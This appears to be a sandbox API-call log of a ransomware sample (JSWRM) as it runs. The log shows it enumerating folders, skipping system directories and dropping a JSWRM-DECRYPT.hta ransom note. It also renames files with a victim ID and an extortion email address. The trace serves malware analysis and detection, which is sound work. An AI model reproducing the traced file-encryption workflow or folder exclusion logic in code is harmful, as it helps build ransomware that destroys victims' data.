WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tiptsf.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tiptsf.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tiptsf.dll", lpUsedDefaultChar=0x0) returned 10 [0068.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tiptsf.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tiptsf.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tiptsf.dll", lpUsedDefaultChar=0x0) returned 10 [0068.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.699] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x6ebfe576, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x17a00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2=".") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="..") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="...") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="windows") returned -1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="recovery") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="perflogs") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="documents and settings") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="system volume information") returned 1 [0068.699] lstrcmpiW (lpString1="tpcps.dll", lpString2="msocache") returned 1 [0068.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tpcps.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tpcps.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tpcps.dll", lpUsedDefaultChar=0x0) returned 9 [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tpcps.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tpcps.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tpcps.dll", lpUsedDefaultChar=0x0) returned 9 [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.700] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2=".") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="..") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="...") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="windows") returned -1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="recovery") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="perflogs") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="documents and settings") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="$RECYCLE.BIN") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="system volume information") returned 1 [0068.700] lstrcmpiW (lpString1="tr-TR", lpString2="msocache") returned 1 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\jswrm-decrypt.hta")) returned 0xffffffff [0068.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.701] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.701] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.702] CloseHandle (hObject=0x454) returned 1 [0068.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\jswrm-decrypt.hta")) returned 0x20 [0068.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.703] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.703] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.703] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9bacd4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f9bacd4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f9bacd4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.703] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.704] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.704] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.705] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091798758413280) returned 0 [0068.705] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.705] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.705] CloseHandle (hObject=0xffffffff) returned 1 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.709] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.709] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.709] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2=".") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="..") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="...") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="windows") returned -1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="recovery") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="perflogs") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="documents and settings") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="$RECYCLE.BIN") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="system volume information") returned 1 [0068.709] lstrcmpiW (lpString1="uk-UA", lpString2="msocache") returned 1 [0068.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 